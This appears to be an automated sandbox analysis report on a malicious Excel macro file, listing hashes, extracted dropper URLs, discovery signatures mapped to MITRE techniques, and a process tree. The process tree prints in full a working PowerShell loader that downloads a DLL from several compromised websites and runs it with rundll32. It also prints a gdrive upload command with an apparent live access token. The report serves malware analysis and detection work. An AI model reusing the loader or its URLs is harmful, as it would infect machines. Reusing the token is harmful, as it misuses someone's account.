13c3ea5f48d2ce7942a0d9b3c7567e5996b362a97738336f55e5f1008ba3ba8b

General

Target

pload/865663204559_17_Nov_2021.xlsm
Size

44KB
MD5

477fd718bb764ffe3c5afde16c6c8dd2
SHA1

eb932e19d95f88d64270d40cdc0b92c6d1cf63be
SHA256

ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3
SHA512

f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://evgeniys.ru/sap-logs/D6/

exe.dropper

http://crownadvertising.ca/wp-includes/OxiAACCoic/

exe.dropper

https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/

exe.dropper

http://immoinvest.com.br/blog_old/wp-admin/luoT/

exe.dropper

https://yoho.love/wp-content/e4laFBDXIvYT6O/

exe.dropper

https://www.168801.xyz/wp-content/6J3CV4meLxvZP/

exe.dropper

https://www.pasionportufuturo.pe/wp-content/XUBS/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4688	4196	cmd.exe	EXCEL.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

2388 tasklist.exe
508 tasklist.exe
3608 tasklist.exe

pid	process
2388	tasklist.exe
508	tasklist.exe
3608	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4196 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

procdump64.exe

pid process

3032 procdump64.exe
3032 procdump64.exe
3032 procdump64.exe
3032 procdump64.exe

pid	process
3032	procdump64.exe
3032	procdump64.exe
3032	procdump64.exe
3032	procdump64.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

tasklist.exeprocdump64.exetasklist.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	2388	tasklist.exe
Token: SeDebugPrivilege	3032	procdump64.exe
Token: SeDebugPrivilege	508	tasklist.exe
Token: SeDebugPrivilege	3608	tasklist.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE
4196	EXCEL.EXE

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 4196 wrote to memory of 4688	4196	EXCEL.EXE	cmd.exe
PID 4196 wrote to memory of 4688	4196	EXCEL.EXE	cmd.exe
PID 4688 wrote to memory of 5116	4688	cmd.exe	powershell.exe
PID 4688 wrote to memory of 5116	4688	cmd.exe	powershell.exe
PID 2840 wrote to memory of 2388	2840	cmd.exe	tasklist.exe
PID 2840 wrote to memory of 2388	2840	cmd.exe	tasklist.exe
PID 2840 wrote to memory of 3032	2840	cmd.exe	procdump64.exe
PID 2840 wrote to memory of 3032	2840	cmd.exe	procdump64.exe
PID 2840 wrote to memory of 3012	2840	cmd.exe	cmd.exe
PID 2840 wrote to memory of 3012	2840	cmd.exe	cmd.exe
PID 3012 wrote to memory of 3496	3012	cmd.exe	cscript.exe
PID 3012 wrote to memory of 3496	3012	cmd.exe	cscript.exe
PID 2840 wrote to memory of 3352	2840	cmd.exe	gdrive.exe
PID 2840 wrote to memory of 3352	2840	cmd.exe	gdrive.exe
PID 2840 wrote to memory of 508	2840	cmd.exe	tasklist.exe
PID 2840 wrote to memory of 508	2840	cmd.exe	tasklist.exe
PID 2840 wrote to memory of 1720	2840	cmd.exe	find.exe
PID 2840 wrote to memory of 1720	2840	cmd.exe	find.exe
PID 2840 wrote to memory of 3608	2840	cmd.exe	tasklist.exe
PID 2840 wrote to memory of 3608	2840	cmd.exe	tasklist.exe
PID 2840 wrote to memory of 3172	2840	cmd.exe	findstr.exe
PID 2840 wrote to memory of 3172	2840	cmd.exe	findstr.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\pload\865663204559_17_Nov_2021.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
3⤵
PID:5116

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2840

C:\Windows\system32\tasklist.exe
tasklist
2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Users\Admin\AppData\Local\Temp\pload\procdump64.exe
procdump64.exe -ma 5116
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cscript.exe dec.vbs
2⤵
- Suspicious use of WriteProcessMemory
PID:3012

C:\Windows\system32\cscript.exe
cscript.exe dec.vbs
3⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\pload\gdrive.exe
gdrive.exe upload --access-token ya29.a0ARrdaM_WSt9QajZZv3IKyl2VX_GATva1IaeDQ6qFo-YL5glldk78310Im4EJo6o9gV608PCv8sDwe4S1DD645RGDCzdvrQa_7T88OxlVlUDmzvfSZfOUlPEjSK5MH7--hQSmX7NTPxUkRzq3X0fBXJAoooDX -p 1NUiA818Vwo-I0Ls9NNaWb8pM5y8SLuXG powershell.exe_211125_165032.dmp
2⤵
PID:3352

C:\Windows\system32\tasklist.exe
tasklist
2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:508

C:\Windows\system32\find.exe
find power
2⤵
PID:1720

C:\Windows\system32\tasklist.exe
tasklist
2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\system32\findstr.exe
findstr power
2⤵
PID:3172

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Process Discovery

1

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\pload\powershell.exe_211125_165032.dmp
MD5
3395357e8a5bc60cc0bd413eaa0cd39a

SHA1
4de70b8b48f0a9d2685671fd48decf3a2897f644

SHA256
3e5c7112ccdf2be377b4af5b42515e42f703089482008de2de40276bbcc90c0e

SHA512
be1eeb8314b7d1e44699742cb152da51a9ddc5ca821f2b24062c0ce3062a6b4a04c4b72e7553b80f4ee349ae6c200edf22db6f67217fbaaffbc3f6697202df66

Download Submit
memory/508-312-0x0000000000000000-mapping.dmp

Download
memory/1720-313-0x0000000000000000-mapping.dmp

Download
memory/2388-306-0x0000000000000000-mapping.dmp

Download
memory/3012-308-0x0000000000000000-mapping.dmp

Download
memory/3032-307-0x0000000000000000-mapping.dmp

Download
memory/3172-315-0x0000000000000000-mapping.dmp

Download
memory/3352-310-0x0000000000000000-mapping.dmp

Download
memory/3496-309-0x0000000000000000-mapping.dmp

Download
memory/3608-314-0x0000000000000000-mapping.dmp

Download
memory/4196-120-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp

Filesize
64KB

Download
memory/4196-118-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp

Filesize
64KB

Download
memory/4196-130-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp

Filesize
64KB

Download
memory/4196-121-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp

Filesize
64KB

Download
memory/4196-123-0x000001C5CCDF0000-0x000001C5CCDF2000-memory.dmp

Filesize
8KB

Download
memory/4196-119-0x00007FF8F8280000-0x00007FF8F8290000-memory.dmp

Filesize
64KB

Download
memory/4196-124-0x000001C5CCDF0000-0x000001C5CCDF2000-memory.dmp

Filesize
8KB

Download
memory/4196-122-0x000001C5CCDF0000-0x000001C5CCDF2000-memory.dmp

Filesize
8KB

Download
memory/4688-290-0x0000000000000000-mapping.dmp

Download
memory/5116-295-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads